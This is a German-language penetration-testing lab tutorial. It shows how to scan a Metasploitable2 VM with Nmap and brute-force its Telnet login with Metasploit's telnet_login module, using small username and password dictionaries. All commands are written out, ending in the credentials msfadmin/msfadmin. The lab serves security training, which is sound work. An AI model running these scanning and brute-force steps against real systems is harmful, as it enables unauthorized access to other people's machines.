Ausnutzung einer Telnet-Dienst-Schwachstelle mit Metasploit

NmapBeginner
Jetzt üben

Einführung

In diesem Lab lernen wir, wie man eine Schwachstelle im Telnet-Dienst ausnutzt und einen Penetrationsangriff durchführt. Das Szenario sieht vor, dass die Kali-Linux-Maschine als Angriffsmaschine und die Metasploitable2-VM als Zielmaschine fungiert. Das Ziel ist es, die Zielmaschine auf Schwachstellen zu scannen, die Telnet-Schwachstelle zu identifizieren und diese mit dem Metasploit Framework auszunutzen.

Starten der Lab-Umgebung

In diesem Schritt starten wir die Lab-Umgebung, die den Kali-Linux-Container und die Metasploitable2-VM umfasst.

  1. Öffnen Sie ein xfce-Terminal auf der LabEx-Hostmaschine und starten Sie das Metasploitable2-Ziel mit dem folgenden Befehl:
sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist; dies kann 1-3 Minuten dauern.

  1. Testen Sie die Konnektivität zur Zielmaschine durch einen Ping:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping zu beenden.

  1. Starten Sie den Kali-Linux-Container und rufen Sie die Bash-Umgebung auf:
docker run -ti --network host b5b709a49cd5 bash
  1. Testen Sie innerhalb des Kali-Containers die Netzwerkverbindung zur Zielmaschine:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping zu beenden.

Nun laufen sowohl die Angriffs- als auch die Zielmaschine, und Sie können mit dem Penetrationstest beginnen.

Hinweis: Wenn Sie die aktuelle Bash versehentlich verlassen, wird der Kali-Container automatisch gestoppt. Sie können docker run -ti --network host b5b709a49cd5 bash erneut auf dem Host ausführen, um einen neuen Kali-Container zu starten und das Experiment fortzusetzen.

Durchführung eines Schwachstellen-Scans

In diesem Schritt verwenden wir Nmap, um die Zielmaschine auf offene Ports und Dienste zu scannen.

Starten Sie zunächst die PostgreSQL-Datenbank, da Metasploit diese zur Datenspeicherung benötigt:

service postgresql start
msfdb init
cd ~
msfconsole

Führen Sie innerhalb der Metasploit-Konsole den Nmap-Scan gegen die Zielmaschine aus:

nmap -sV -T4 192.168.122.102

Die Option -sV scannt offene Ports und zeigt detaillierte Informationen an, während -T4 die Timing-Richtlinie für den Scan festlegt (0-5; höhere Werte sind schneller, aber auffälliger).

Analyse der Scan-Ergebnisse

In diesem Schritt analysieren wir die Nmap-Scan-Ergebnisse, um den anfälligen Telnet-Dienst zu identifizieren.

Die Ausgabe des Nmap-Scans zeigt, dass der Telnet-Dienst auf Port 23 mit dem Banner "Linux telnetd" läuft. Suchen wir nach dem entsprechenden Metasploit-Modul:

search scanner/telnet

Verwenden Sie das Modul auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Lassen Sie sich die Moduloptionen anzeigen:

show options

Die erforderliche Option ist RHOSTS, welche den Zielhost bzw. die Zielhosts angibt.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu verlassen und die Überprüfung zu starten

Vorbereitung der Benutzername- und Passwort-Wörterbücher

In diesem Schritt bereiten wir die Wörterbuchdateien für Benutzernamen und Passwörter für den Brute-Force-Angriff vor.

Kehren Sie zur Shell des Kali-Containers zurück, bevor Sie die Dateien erstellen. Falls Sie sich noch in der msfconsole befinden, drücken Sie Ctrl+D, um zur Container-Shell zurückzukehren. Ihr Prompt sollte in etwa so aussehen: root@...:/#.

Erstellen Sie /username.txt mit den folgenden Benutzernamen:

cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF

Erstellen Sie /password.txt mit den folgenden Passwörtern:

cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF

Diese Dateien werden als Wörterbücher für den Brute-Force-Angriff verwendet.

Konfiguration des Metasploit-Moduls

In diesem Schritt konfigurieren wir das Metasploit-Modul mit dem Zielhost sowie den Wörterbuchdateien für Benutzernamen und Passwörter.

Falls Sie sich nicht in der Metasploit-Konsole befinden, starten Sie diese zuerst:

cd ~
msfconsole

Verwenden Sie das Modul auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Legen Sie den Zielhost fest:

set RHOSTS 192.168.122.102

Geben Sie die Datei für die Benutzernamen an:

set USER_FILE /username.txt

Geben Sie die Datei für die Passwörter an:

set PASS_FILE /password.txt

Führen Sie abschließend den Exploit aus:

exploit

Metasploit beginnt nun, verschiedene Kombinationen aus den bereitgestellten Wörterbüchern zu testen. Wenn gültige Anmeldedaten gefunden werden, werden diese in Grün angezeigt.

In diesem Fall lauten die gültigen Anmeldedaten msfadmin/msfadmin.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu verlassen und die Überprüfung zu starten

Zusammenfassung

In diesem Lab haben wir gelernt, wie man eine Schwachstelle im Telnet-Dienst mithilfe des Metasploit Frameworks ausnutzt. Wir begannen mit der Einrichtung der Lab-Umgebung, bestehend aus der Kali-Linux-Angriffsmaschine und der Metasploitable2-Zielmaschine. Anschließend führten wir einen Schwachstellen-Scan mit Nmap durch, um den offenen Telnet-Dienst zu identifizieren. Danach bereiteten wir die Wörterbücher vor und konfigurierten das Metasploit-Modul mit dem Zielhost und den entsprechenden Dateien. Schließlich führten wir den Exploit aus und konnten die Telnet-Anmeldedaten erfolgreich per Brute-Force ermitteln.

Dieses Lab bot praktische Erfahrungen in den Bereichen Penetration Testing, Schwachstellen-Scanning und der Nutzung des Metasploit Frameworks zur Ausnutzung von Sicherheitslücken. Es verdeutlichte die Bedeutung sicherer Passwortpraktiken und die Risiken, die mit der Verwendung schwacher oder leicht zu erratender Anmeldedaten verbunden sind.